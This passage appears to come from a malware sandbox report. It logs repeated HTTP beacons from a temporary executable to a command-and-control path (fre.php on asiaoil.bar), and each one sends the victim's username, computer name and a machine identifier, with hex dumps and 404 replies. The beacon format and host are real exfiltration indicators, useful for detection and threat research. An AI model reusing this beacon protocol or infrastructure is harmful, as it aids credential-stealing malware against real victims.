                        Feb 10, 2022 10:22:37.137352943 CET368OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:37.238821030 CET368INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RG%2BfeuYDl%2BqDfIJiQqO%2F%2BvdeX%2FsqQOMNdYojKtTw1E0TmD5kZfpZ7nDimmccAbecgCEw4KhPek%2BrNtGEwSzq0DOsMtNFWpBsI22TENldaFbPIU5b5CTiuxOP6VQaaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446260fb19019-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        33192.168.2.2249198172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:38.172976971 CET369OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:38.189532995 CET369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:38.275609016 CET370INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:38 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8i3MYQHtfXVP%2F0fASkC1TmdLbF6CiAiraD%2FH44NC0ykl97qHV9jn8MkbKPqY5BdlYRn49S%2F8lYCjj%2FQu3cIXkHTHLxiFgznNR4%2Bp6Kgrrg52L092%2FlGqFymsCMGR0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4462c9e3791fc-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        34192.168.2.2249199172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:39.224649906 CET371OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:39.242547989 CET371OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:39.314145088 CET372INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8IzBsU9ezcfTcYipeA3VQtk7w40pxZ5hjlcKQvqw49ojoP1nGh40I6q6Dyh76z4LCC%2BA20%2Fsg0VifVwdOdSi33A6OvrYN65%2FpXFFW%2FSM0mozc%2B4piSK803pIJT8SEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446333d2791ff-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        35192.168.2.2249200104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:40.420564890 CET373OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:40.437928915 CET373OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:40.521979094 CET374INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9t3R%2F4b%2BnD1kTHMJA2ZVHrmeMMJ3Bd02VhJ1WPbcEvJly%2BkAhl4QMrCDxePymIvRWvfDOjaPHdcP0k0kjEFpUPsz22Xy7Rg%2F6wzikwLkWIzwoyWJkUL5tvQWI96tAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4463aab43920b-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        36192.168.2.2249201104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:41.439397097 CET375OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:41.455754042 CET375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:41.572663069 CET375INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U73XLOsc6Oe9yZY%2B47E4Oe8aR4QjbykbQwVxWcy4AoCZmzTRfSc4KodkgvxCsNphdTrX0C20cDMAGUY1y%2Fzw8iNzNLGyI2dqsO%2B6Mc%2FCxzGZVmVZz0bSOwNj1s7QeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446410864918f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        37192.168.2.2249202172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:42.533999920 CET376OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:42.550273895 CET377OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:42.618619919 CET377INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:42 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gufXVp6viiLfqUVAIhTCHjYJOWCjHt2MTTOHWp5%2BFhyL3M%2BbMbx%2BVMYETZElkIaZ%2FIvrsDt5jDpyZjmMZ9o2O%2FwcV9pRsZqOTc1AF0p2Ib213bW35V6pz00NvcCpPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44647eb7b693a-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        38192.168.2.2249203172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:43.544899940 CET378OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:43.561275959 CET378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:43.664395094 CET379INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yKL07jfvs%2BVU4LY4v4Lf0ZGlr%2FIQtMwEPs3bXhHAZspcC%2BNoewD0Rp%2Bye%2FUTm0R72TSKjFoKvNaY7JUUOQLFHqLgLo%2BRTvtpResbSpFvDqoGUIkATecZSSRbWV5rqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4464e3d16912a-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        39192.168.2.2249204172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:44.584137917 CET380OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:44.600441933 CET380OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:44.682432890 CET381INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YEpekNteQXIJDJauaElbNeLCz0rJIFKhZ7g570xBDVwmYpo12zP6dtthdwoFyYhQ53RMVLKxNG0u7RjPVwRtZkMkV1Qw90wv9Z0CU6vQQlTHweFh1xgcsARiAUxjiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44654bfd79199-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.2249169172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:04.920207977 CET318OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:04.937419891 CET318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:05.027216911 CET318INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WGSy9RBpA4nwv8vPkiC6IlReHDy2beH0Xpr8Jw91%2BmfmRccN%2FYfWCgt%2Fb96BC2i38aPjRgJdSwh7RJOrlqreqeiX8LTLhluVlMMPLsLX%2BVqck485IQfR0ZCBs3Abjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4455ccab45c80-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        40192.168.2.2249205104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:45.641460896 CET382OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:45.657860994 CET382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:45.752800941 CET383INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgBF41clmh4ryuHtU9aOlwd5HEGXjVWqgWBKt0N2O3lBaHqKVGyePCSnXUW7Z%2B9ZswG3zzpAggxRL3OI9PhK3b7diqp15dvDHTlhkQ9V7NyyEid0hjMzsNR7GBdvGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4465b4f709186-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        41192.168.2.2249206172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:46.729665995 CET383OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:46.746081114 CET384OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:46.816407919 CET384INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIeTn8QUGJ4PzoL3khYwIjL17%2BBJiTqpZBu%2Bn6l1sSUiSmu%2FH0zc5lyfpLKOHy9tsuu9Y%2F%2BH47s3hpg5DfFC4zroN87eErlds3zDKfV6u79W6o1WqB%2F6UGbnxHqWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446621d638fc5-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        42192.168.2.2249207172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:47.737185955 CET385OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:47.753462076 CET386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:47.842878103 CET386INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:47 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6LETH6p%2BXICZC%2BrIHSRQApAEV%2Bdr0iLIW7rBeA%2Fr7Hi4%2Fpf1OlVs9AUjZdSrzw3XtXmW7vu3g0lnMlRgI0IK52z10KSNGVwmWG%2FAp9wtB9EgWL0CS5tO1Mwb6FiG8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446686e9b6945-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        43192.168.2.2249208172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:48.837397099 CET387OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:48.854139090 CET387OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:48.933581114 CET388INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4V5E6ygM8Zq2gQc6SjFi%2FduljsFbImOHJ2nmf7IuPxW2RhXkT%2B0BhOAD5WjYjJ5QxUVoGAUnhyaY3n4fiulEfle%2F5%2F3JKoNA8quALyniLNaaaxsFzuwruQ92V8j%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4466f4f5c92a2-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        44192.168.2.2249209172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:49.900198936 CET389OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:49.916532040 CET389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:50.045497894 CET390INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:50 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfchENBNL5Aam3jQilD1C%2BA7X%2BWklnynb2xLSVS2hPjR0y3qmNn6hmUtwb8IQB8oZoMl23JHAHV2q0I12pykgsoVoLNPvb6k5VdZyObk9ltGFYeKlP7GBpYhUI6%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44675ef0390ee-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        45192.168.2.2249210172.67.197.6680C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:51.041532993 CET391OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:51.057890892 CET391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:51.130028963 CET392INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Tlu5Y7AoBorQeMU0%2B32D%2BTFyCDvUY1OQkVB8rypJEdhrQ%2Fenzeu1n%2FT9n9uSqWWX9J%2BfmRJVbTKpt0De%2B5ne1ly1J723TtCWodVcJOhHfjabsPPmaz0oqCOHEICNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4467d0fb492c5-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        46192.168.2.2249211104.21.49.24480C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        TimestampkBytes transferredDirectionData
                        Feb 10, 2022 10:22:52.063119888 CET392OUTPOST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
